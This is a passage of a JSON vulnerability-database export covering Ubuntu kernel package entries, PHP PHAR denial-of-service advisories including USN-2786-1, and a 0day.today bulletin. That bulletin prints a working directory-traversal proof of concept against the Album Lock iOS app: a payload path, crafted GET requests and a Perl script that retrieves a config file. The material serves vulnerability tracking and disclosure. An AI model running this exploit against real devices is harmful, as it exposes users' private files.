"OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.0"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "5.3.0-1020.22~18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gkeop"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gkeop-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-99.100~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-5.8"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1059.60", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1071.78", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-trusty"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-xenial"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-xenial"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-5.10"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-5.6"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-osp1"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-osp1"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1038.42", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1038.42~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1061.65", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1133.142", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2-5.3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "5.3.0-1026.28~18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-riscv"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-riscv"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1077.84", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1137.145", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}], "bugs": ["https://bugzilla.suse.com/show_bug.cgi?id=1180098"], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "zdt": [{"id": "1337DAY-ID-27066", "hash": "1654d40c89acf5c9b449f9b490c1768d", "type": "zdt", "bulletinFamily": "exploit", "title": "Album Lock 4.0 iOS - Directory Traversal Vulnerability", "description": "Exploit for iOS platform in category web applications", "published": "2017-02-21T00:00:00", "modified": "2017-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27066", "reporter": "bot", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-19T15:31:10", "history": [], "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-02-19T15:31:10", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27066"]}, {"type": "zdt", "idList": ["1337DAY-ID-9931"]}], "modified": "2018-02-19T15:31:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27066", "sourceData": "Document Title:\r\n===============\r\nAlbum Lock v4.0 iOS - Directory Traversal Vulnerability\r\n\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nDo you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most \r\nconvenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways. \r\nFrom Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.\r\n \r\n(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )\r\n \r\n \r\n \r\nSeverity Level:\r\n===============\r\nHigh\r\n \r\n \r\nTechnical Details & Description:\r\n================================\r\nA directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.\r\nThe issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.\r\n \r\nThe directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers \r\nare able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able \r\nto request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document` \r\npath of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server \r\nweb-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.\r\n \r\nThe security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. \r\nExploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the \r\nvulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.\r\n \r\nRequest Method(s):\r\n[+] GET\r\n \r\nVulnerable Module(s):\r\n[+] getObject\r\n \r\nVulnerable Parameter(s):\r\n[+] filePaht\r\n \r\nAffected Module(s):\r\n[+] Web-Server File System\r\n \r\n \r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n \r\n \r\nStandard Request:\r\nhttp://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png\r\n \r\n \r\nPoC: Payload\r\n/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application\r\n \r\n \r\nMalicious Request: Exploitation\r\nhttp://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/\r\nhttp://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/\r\nhttp://localhost:8880/getImage?filePaht=/var/mobile/\r\n \r\n \r\nPoC: Exploit\r\nuse strict;\r\nuse LWP::UserAgent;\r\nmy $b = LWP::UserAgent->new();\r\nmy $host = \"1.1.1.1:5555\";\r\nprint $b->get(\"http://\".$host.\"/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat\")->content;\r\n \r\n \r\n--- PoC Session Logs [GET] ---\r\nStatus: 200[OK]\r\nGET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application \r\nMime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost:8880]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]\r\n Accept[*/*]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]\r\n Connection[keep-alive]\r\n Response Header:\r\n Accept-Ranges[bytes]\r\n \r\n \r\nReference(s):\r\nhttp://localhost:8880/\r\nhttp://localhost:8880/getImage\r\nhttp://localhost:8880/getImage?filePaht=\r\nhttp://localhost:8880/list_gif.html\r\nhttp://localhost:8880/list_gif.html?folder=\r\n \r\n \r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.\r\nInclude a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.\n\n# 0day.today [2018-02-19] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:14753", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "PHAR extension DoS.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2021-06-08T19:08:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHAR extension DoS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:03", "references": [{"idList": ["ALAS-2015-602", "ALAS-2015-601"], "type": "amazon"}, {"idList": ["CVE-2015-7803", "CVE-2015-7804"], "type": "cve"}, {"idList": ["H1:103990", "H1:104008"], "type": "hackerone"}, {"idList": ["SECURITYVULNS:DOC:32651"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310806649", "OPENVAS:1361412562310806648", "OPENVAS:703380", "OPENVAS:1361412562310120520", "OPENVAS:1361412562310842508", "OPENVAS:1361412562310807000", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310703380", "OPENVAS:1361412562310120396", "OPENVAS:1361412562311220191984"], "type": "openvas"}, {"idList": ["RHSA-2016:0457"], "type": "redhat"}, {"idList": ["SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1", "SUSE-SU-2016:1581-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"], "type": "debian"}, {"idList": ["USN-2786-1"], "type": "ubuntu"}, {"idList": ["SSA-2016-034-04"], "type": "slackware"}, {"idList": ["GLSA-201606-10"], "type": "gentoo"}, {"idList": ["ALA_ALAS-2015-602.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "UBUNTU_USN-2786-1.NASL", "PHP_5_6_14.NASL", "SUSE_SU-2016-0284-1.NASL", "PHP_5_5_30.NASL", "SLACKWARE_SSA_2016-034-04.NASL", "OPENSUSE-2016-100.NASL", "ALA_ALAS-2015-601.NASL", "DEBIAN_DSA-3380.NASL"], "type": "nessus"}, {"idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"], "type": "freebsd"}, {"idList": ["F5:K17503", "SOL17503"], "type": "f5"}, {"idList": ["CLSA-2020:1605798462"], "type": "cloudlinux"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:03", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "5bebcb6b83df2b42d069178c1e9ea73c038f8703bc95cf2b81c683a8d0d17ff6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "94aee96d0a33ff770af1ab8e308073f0", "key": "cvelist"}, {"hash": "c514412540c1e967450f03283e4ed180", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "5c799165d68e636bd0726587ae899c0d", "key": "description"}, {"hash": "6d2dcaed858380d54d5782ad38c55586", "key": "affectedSoftware"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "b3b8db0e3c7acd6c3190db6f8e88e96b", "key": "href"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "3a18a828bc11b79a70839be146b3b5a3", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "id": "SECURITYVULNS:VULN:14753", "immutableFields": [], "lastseen": "2018-08-31T11:10:03", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "reporter": "BUGTRAQ", "title": "PHP security vulnerabilities", "type": "securityvulns", "viewCount": 212}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:03"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "1858c8bfb7eb8aace48fa57059397c29"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "5c799165d68e636bd0726587ae899c0d"}, {"key": "href", "hash": "b3b8db0e3c7acd6c3190db6f8e88e96b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "c514412540c1e967450f03283e4ed180"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8859a40c26baff900b73dab92cbb6fd72e9b8dcbbd9acc6d613b18d55563796e", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2021-06-08T19:08:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-06-08T19:08:49", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "php", "operator": "eq", "version": "5.6"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32651", "bulletinFamily": "software", "title": "[USN-2786-1] PHP vulnerabilities", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "7591a4414fab4e00d545d96f67923bfe"}, {"key": "href", "hash": "91f326dd520bc78a7e8becd3c39b6be5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "29738b7846c783fb3a4f2a49b7c4ccd3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d2381bcd69ce89f633080a3b3bcd22d9c6038a3c2512d85530ef0a4ad6a45bd8", "viewCount": 181, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14753"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}]}